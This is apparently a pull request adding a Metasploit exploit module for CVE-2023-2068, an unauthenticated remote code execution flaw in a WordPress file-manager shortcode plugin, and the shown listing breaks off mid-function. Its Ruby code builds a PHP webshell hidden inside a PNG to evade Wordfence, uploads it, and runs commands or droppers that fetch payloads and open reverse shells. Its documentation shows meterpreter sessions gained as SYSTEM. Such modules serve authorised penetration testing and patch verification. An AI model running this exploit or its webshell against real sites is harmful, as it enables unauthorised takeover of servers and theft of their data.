### PR TITLE
WordPress File Manager Advanced Shortcode Unauthenticated RCE [CVE-2023-2068]

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -58,3 +58,4 @@ elementor
 bookingpress
 paid-memberships-pro
 woocommerce-payments
+file-manager-advanced-shortcode

--- a/documentation/modules/exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce.md
@@ -1,0 +1,306 @@
+## Vulnerable Application
+
+WordPress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode.
+
+The WordPress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
+This leads to RCE in cases where the allowed MIME type list does not include PHP files.
+In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
+
+File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
+To install the Shortcode plugin, File Manager Advanced version `5.0.5` or lower is required to keep the configuration vulnerable.
+Any user can exploit this vulnerability which results in access to the underlying operating system with the same privileges
+under which the WordPress web services run.
+
+For more information, see [This Article](https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068).
+
+This module has been tested on:
+* Windows  Server 2019 Standard and Kali Linux running on Raspberry PI.
+* WordPress 6.2.2
+* File Manager Advanced 5.0.5
+* File Manager Advanced Shortcode 2.3.2
+
+**Instructions for a vulnerable WordPress installation:**
+For Windows and Linux follow these instructions to install and configure WAMP64 and WordPress:
+[Install WordPress locally](https://www.hostinger.com/tutorials/install-wordpress-locally)
+
+After you have successfully installed and configures WordPress, follow the below steps to install the vulnerable plugins and configure
+a web page with the file-manager-advanced shortcode embedded.
+1. Download WordPress plugins:
+* [File Manager Advanced 5.0.5](https://github.com/h00die-gr3y/Metasploit/blob/main/images/file-manager-advanced.zip)
+* [File Manager Advanced Shortcode 2.3.2](https://github.com/h00die-gr3y/Metasploit/blob/main/images/file-manager-advanced-shortcode-2.3.2-mdnhux.zip)
+2. Login as admin in WordPress
+3. On left side Menu, goto `Plugins`
+5. Click `Add New` on the submenu
+6. Page with installed Plugins appears. Click on the top on the button `Add New`
+7. Page with list of Plugins appears. Click on the top on the button `Upload Plugin`
+8. Page with `browse` button appears. Browse for file-manager-advanced.zip file that you have downloaded in step 1.
+9. Click `install` button
+10. Repeat same process for `file-manager-advanced-shortcode-2.3.2-mdnhux.zip`
+11. When both plugins are installed successfully, configure a webpage with the file-manager-advanced shortcode embedded:
+* Example [/] shortcode:
+```
+[file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations="download,upload"
+ block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]
+```
+12. Set the `TARGETURI` option with the uripath pointing to this webpage
+13. Run the module and enjoy a `reverse shell` or `meterpreter`
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Powershell, 5=Windows Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > info
+
+       Name: Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode
+     Module: exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
+   Platform: Windows, Unix, Linux, PHP
+       Arch: cmd, php, x64, x86, aarch64
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2023-05-31
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Mateus Machado Tesser
+
+Module side effects:
+ artifacts-on-disk
+ ioc-in-logs
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   PHP
+      1   Unix Command
+      2   Linux Dropper
+      3   Windows Command
+      4   Windows Powershell
+      5   Windows Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting                Required  Description
+  ----       ---------------                --------  -----------
+  Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS     192.168.201.10                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+  RPORT      80                             yes       The target port (TCP)
+  SSL        false                          no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /wordpress/index.php/fma-auth  yes       File Manager Advanced (FMA) Shortcode URI path
+  URIPATH                                   no        The URI to use for this exploit (default is random)
+  VHOST                                     no        HTTP server virtual host
+  WEBSHELL                                  no        The name of the webshell with extension php. Webshell name will be randomly generated if left unset.
+
+
+  When TARGET is not 0:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
+                                       addresses.
+  SRVPORT  1981             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
+  This leads to RCE in cases where the allowed MIME type list does not include PHP files.
+  In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
+  File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
+  To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
+  vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
+  with the same privileges under which the Wordpress web services run.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2023-2068
+  https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068
+  https://packetstormsecurity.com/files/172707
+  https://wpscan.com/vulnerability/58f72953-56d2-4d86-a49b-311b5fc58056
+
+
+View the full module info with the info -d command.
+```
+## Options
+
+### TARGETURI
+The uripath to the webpage where the file-manager-advanced shortcode is embedded.
+
+### WEBSHELL
+You can use this option to set the filename and extension (should be .php) of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+### COMMAND
+This option provides the user to choose the PHP underlying shell command function to be used for execution.
+The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
+This option is only available when the target selected is either Unix Command or Linux Dropper.
+For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
+
+## Scenarios
+### Windows Server 2019 PHP - php/meterpreter/reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.55
+[+] Deleted KBWxIdRChosZC.php
+[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.55:50380) at 2023-06-28 14:13:07 +0000
+
+meterpreter > sysinfo
+Computer    : WIN-BJDNH44EEDB
+OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
+Meterpreter : php/windows
+meterpreter > getuid
+Server username: SYSTEM
+meterpreter >
+```
+### Kali Linux Server Unix Command -  cmd/unix/reverse_bash
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[+] Deleted LlCresesS.php
+[*] Command shell session 5 opened (192.168.201.10:4444 -> 192.168.201.10:56290) at 2023-06-28 15:34:20 +0000
+
+uname -a
+Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+### Kali Linux Server Linux Dropper -  linux/aarch64/meterpreter_reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
+[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/manX3C
+[*] Client 192.168.201.10 (Wget/1.21.3) requested /manX3C
+[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
+[+] Deleted nypafHKuf.php
+[*] Meterpreter session 6 opened (192.168.201.10:4444 -> 192.168.201.10:38108) at 2023-06-28 15:36:11 +0000
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: www-data
+meterpreter >
+```
+### Windows Server 2019 Windows Command - cmd/windows/powershell/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
+[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
+[*] Sending stage (200774 bytes) to 192.168.201.55
+[+] Deleted HAJSKquhaDT.php
+[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.55:50464) at 2023-06-28 14:21:39 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+### Windows Server 2019 Powershell - windows/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
+[*] Executing Windows Powershell for windows/x64/meterpreter/reverse_tcp
+[*] Sending stage (200774 bytes) to 192.168.201.55
+[+] Deleted XeIbfNpxl.php
+[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.55:50494) at 2023-06-28 14:24:08 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+### Windows Server 2019 Windows Dropper - windows/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
+[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/yRZ6hM
+[*] Client 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /yRZ6hM
+[*] Sending payload to 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
+[*] Sending stage (200774 bytes) to 192.168.201.55
+[+] Deleted hjAQqbEFAt.php
+[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.55:50519) at 2023-06-28 14:26:02 +0000
+[*] Command Stager progress - 100.00% done (146/146 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
+
+## Limitations
+No limitations.

--- a/documentation/modules/exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce.md
@@ -20,30 +20,102 @@ This module has been tested on:
 * File Manager Advanced Shortcode 2.3.2
 
 **Instructions for a vulnerable WordPress installation:**
-For Windows and Linux follow these instructions to install and configure WAMP64 and WordPress:
-[Install WordPress locally](https://www.hostinger.com/tutorials/install-wordpress-locally)
+Create a new docker-compose.yml file:
+```
+version: '3.1'
 
-After you have successfully installed and configures WordPress, follow the below steps to install the vulnerable plugins and configure
-a web page with the file-manager-advanced shortcode embedded.
-1. Download WordPress plugins:
-* [File Manager Advanced 5.0.5](https://github.com/h00die-gr3y/Metasploit/blob/main/images/file-manager-advanced.zip)
-* [File Manager Advanced Shortcode 2.3.2](https://github.com/h00die-gr3y/Metasploit/blob/main/images/file-manager-advanced-shortcode-2.3.2-mdnhux.zip)
-2. Login as admin in WordPress
-3. On left side Menu, goto `Plugins`
-5. Click `Add New` on the submenu
-6. Page with installed Plugins appears. Click on the top on the button `Add New`
-7. Page with list of Plugins appears. Click on the top on the button `Upload Plugin`
-8. Page with `browse` button appears. Browse for file-manager-advanced.zip file that you have downloaded in step 1.
-9. Click `install` button
-10. Repeat same process for `file-manager-advanced-shortcode-2.3.2-mdnhux.zip`
-11. When both plugins are installed successfully, configure a webpage with the file-manager-advanced shortcode embedded:
-* Example [/] shortcode:
+services:
+
+  wordpress:
+    image: wordpress:6.2.2-php8.0
+    restart: always
+    ports:
+      - 8080:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: exampleuser
+      WORDPRESS_DB_PASSWORD: examplepass
+      WORDPRESS_DB_NAME: exampledb
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exampledb
+      MYSQL_USER: exampleuser
+      MYSQL_PASSWORD: examplepass
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
 ```
-[file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations="download,upload"
- block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]
+
+Now start the application:
 ```
-12. Set the `TARGETURI` option with the uripath pointing to this webpage
-13. Run the module and enjoy a `reverse shell` or `meterpreter`
+docker-compose up
+```
+
+Then verify the application is running at http://127.0.0.1:8080 - and complete the installation steps.
+
+## Installing the vulnerable application
+After you have successfully installed and configured WordPress, follow the below steps to install the vulnerable plugins.
+From the same directory as the `docker-compose.yml` file enter into an interactive terminal:
+```
+docker-compose exec -it wordpress /bin/bash
+```
+
+Inside the container install the first plugin - `file-manager-advanced`:
+```
+cd /var/www/html/wp-content/plugins
+apt update
+apt install unzip
+curl -O https://downloads.wordpress.org/plugin/file-manager-advanced.5.0.zip
+unzip ./file-manager-advanced.5.0.zip
+unzip file-manager-advanced/file-manager-advanced.zip
+rm ./file-manager-advanced.5.0.zip
+rm file-manager-advanced/file-manager-advanced.zip
+```
+
+Then for the second plugin - `file-manager-advanced-shortcode`
+```
+cd /var/www/html/wp-content/plugins
+curl -L -O https://github.com/h00die-gr3y/Metasploit/raw/main/images/file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+```
+
+Verify the sha256 matches - `3d5ff82293ec2d98d1f70f27434f810c0c02d38f97d512332a43b8777dde09fe`. *Note - if this does not match we advise a security review of the plugin*:
+```
+sha256sum ./file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+
+3d5ff82293ec2d98d1f70f27434f810c0c02d38f97d512332a43b8777dde09fe  ./file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+```
+
+Extract the plugin and remove the upgrade script:
+```
+unzip file-manager-advanced-shortcode-2.3.2-mdnhux.zip
+apt install vim
+
+# Delete the upgrade library file
+rm file-manager-advanced-shortcode/upgrade/upgrade.php
+
+# Delete the upgrade requests
+vim file-manager-advanced-shortcode/file-manager-advanced-shortcode.php
+
+# Ensure these lines are removed from 'file-manager-advanced-shortcode/file-manager-advanced-shortcode.php'
+# require_once ( 'upgrade/upgrade.php');
+# new file_manager_advanced_shortcode_updates( $fma_plugin_current_version, $fma_plugin_remote_path, $fma_plugin_slug, $fma_license_order, $fma_license_key );
+```
+
+Now activate the plugins and create the vulnerable Wordpress page.
+1. Login as the previously created Wordpress account
+2. On left side menu, then go to `Plugins`
+3. Activate the File Manager Advanced plugin
+4. Activate the File Manager Advanced Shortcode plugin
+5. Navigate to `Pages` on the left side menu and select `Add New`
+6. Click the `+` symbol in the top left of the webpage and search for `Shortcode`
+7. Select `Shortcode` and paste the follow Shortcode:
+    ```
+    [file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations="download,upload"
+     block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]
+    ```
+8. Set the `TARGETURI` option with the uripath pointing to this webpage e.g. `/?page_id=5`
+9. Run the module and enjoy a `reverse shell` or `meterpreter`
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce.md
@@ -53,7 +53,7 @@ List the steps needed to make sure this thing works
 - [ ] `use exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce`
 - [ ] `set rhosts <ip-target>`
 - [ ] `set rport <port>`
-- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Powershell, 5=Windows Dropper>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>`
 - [ ] `exploit`
 - [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
 
@@ -90,8 +90,7 @@ Available targets:
       1   Unix Command
       2   Linux Dropper
       3   Windows Command
-      4   Windows Powershell
-      5   Windows Dropper
+      4   Windows Dropper
 
 Check supported:
   Yes
@@ -235,30 +234,6 @@ msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
 [*] Sending stage (200774 bytes) to 192.168.201.55
 [+] Deleted HAJSKquhaDT.php
 [*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.55:50464) at 2023-06-28 14:21:39 +0000
-
-meterpreter > sysinfo
-Computer        : WIN-BJDNH44EEDB
-OS              : Windows 2016+ (10.0 Build 17763).
-Architecture    : x64
-System Language : en_US
-Domain          : WORKGROUP
-Logged On Users : 1
-Meterpreter     : x64/windows
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter >
-```
-### Windows Server 2019 Powershell - windows/x64/meterpreter/reverse_tcp
-```
-msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.201.10:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
-[*] Executing Windows Powershell for windows/x64/meterpreter/reverse_tcp
-[*] Sending stage (200774 bytes) to 192.168.201.55
-[+] Deleted XeIbfNpxl.php
-[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.55:50494) at 2023-06-28 14:24:08 +0000
 
 meterpreter > sysinfo
 Computer        : WIN-BJDNH44EEDB

--- a/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb
@@ -1,0 +1,318 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Format::PhpPayloadPng
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode',
+        'Description' => %q{
+          The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
+          This leads to RCE in cases where the allowed MIME type list does not include PHP files.
+          In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
+          File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
+          To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
+          vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
+          with the same privileges under which the Wordpress web services run. 
+        },
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
+          'Mateus Machado Tesser' # discovery
+        ],
+        'References' => [
+          ['CVE', '2023-2068'],
+          ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068'],
+          ['PACKETSTORM', '172707'],
+          ['WPVDB', '58f72953-56d2-4d86-a49b-311b5fc58056']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['windows', 'unix', 'linux', 'php'],
+        'Privileged' => false,
+        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'Space' => 65535,
+              'CmdStagerFlavor' => ['wget', 'curl', 'printf', 'bourne'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Powershell',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :windows_powershell,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :windows_dropper,
+              'Space' => 3000,
+              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-05-31',
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'File Manager Advanced (FMA) Shortcode URI path', '/']),
+        OptString.new('WEBSHELL', [
+          false, 'The name of the webshell with extension php. Webshell name will be randomly generated if left unset.', nil
+        ]),
+        OptEnum.new('COMMAND',
+                    [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])
+      ]
+    )
+  end
+
+  def get_form_data(png_webshell)
+    # construct multipart form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part('', nil, nil, 'form-data; name="reqid"')
+    form_data.add_part('upload', nil, nil, 'form-data; name="cmd"')
+    form_data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
+    form_data.add_part('fma_load_shortcode_fma_ui', nil, nil, 'form-data; name="action"')
+    form_data.add_part(@wp_data['fmakey'].to_s, nil, nil, 'form-data; name="_fmakey"')
+    form_data.add_part(@upload_path.to_s, nil, nil, 'form-data; name="path"')
+    form_data.add_part('', nil, nil, 'form-data; name="url"')
+    form_data.add_part('false', nil, nil, 'form-data; name="w"')
+    form_data.add_part('true', nil, nil, 'form-data; name="r"')
+    form_data.add_part('plugins', nil, nil, 'form-data; name="hide"')
+    form_data.add_part('upload,download', nil, nil, 'form-data; name="operations"')
+    form_data.add_part('inside', nil, nil, 'form-data; name="path_type"')
+    form_data.add_part('no', nil, nil, 'form-data; name="hide_path"')
+    form_data.add_part('no', nil, nil, 'form-data; name="enable_trash"')
+    form_data.add_part('image/png,text/x-php', nil, nil, 'form-data; name="upload_allow"')
+    form_data.add_part('2G', nil, nil, 'form-data; name="upload_max_size"')
+    form_data.add_part(png_webshell.to_s, 'image/png, text/x-php', 'binary', "form-data; name=\"upload[]\"; filename=\"#{@webshell_name}\"")
+    form_data.add_part('', nil, nil, 'form-data; name="mtime[]"')
+    return form_data
+  end
+
+  def upload_webshell
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : datastore['WEBSHELL'].to_s)
+
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    payload = if target['Type'] == :php
+                "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
+              else
+                "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"
+              end
+
+    # inject PHP payload into the PLTE chunk of the PNG image to bypass security such as Wordfence
+    png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')
+    if png_webshell.nil?
+      return false
+    end
+
+    # Upload payload in Wordpress root for execution
+    # try again at the configured upload directory if LFI fails
+    @upload_path = ''
+    no_break = true
+    loop do
+      form_data = get_form_data(png_webshell)
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('/', @wp_data['baseurl'], 'wp-admin', 'admin-ajax.php'),
+        'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+        'data' => form_data.to_s
+      })
+      if res && res.code == 200 && !res.body.blank?
+        # parse json to find the webshell name embedded in the response at the "added" section that indicates a successful upload
+        res_json = res.get_json_document
+        return false if res_json.blank?
+        return true if res_json.dig('added', 0, 'name') == @webshell_name
+
+        # If we face an upload permission error, use the configured upload directory path to upload the payload
+        # We might not have execution rights there, but at least we can try ;-)
+        if res_json.dig('warning', 0) == 'errUploadFile' && res_json.dig('warning', 2) == 'errPerm' && no_break
+          @upload_path = @wp_data['path']
+          no_break = false
+        else
+          return false
+        end
+      else
+        return false
+      end
+    end
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('/', @wp_data['baseurl'], @upload_path, @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('/', @wp_data['baseurl'], @upload_path, @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def check_fma_shortcode_plugin
+    # check if fma shortcode plugin is installed and return fmakey, upload directory path and Wordpress base url
+    @wp_data = {}
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'])
+    })
+    if res && res.body && res.code == 200
+      # 1. Get the fmakey information by searching for strings:
+      # /_fmakey: '1555ef603c',/ or /_fmakey:'1555ef603c',/ or /"fmakey":"1555ef603c",/
+      fmakey_match1 = res.body.match(/_fmakey:.*'.*',/)
+      fmakey_match2 = res.body.match(/"fmakey":".*",/)
+      return if fmakey_match1.nil? && fmakey_match2.nil?
+
+      if fmakey_match1
+        @wp_data['fmakey'] = fmakey_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip
+      else
+        @wp_data['fmakey'] = fmakey_match2[0].split(',')[0].split(':')[1].tr('"', '').strip
+      end
+
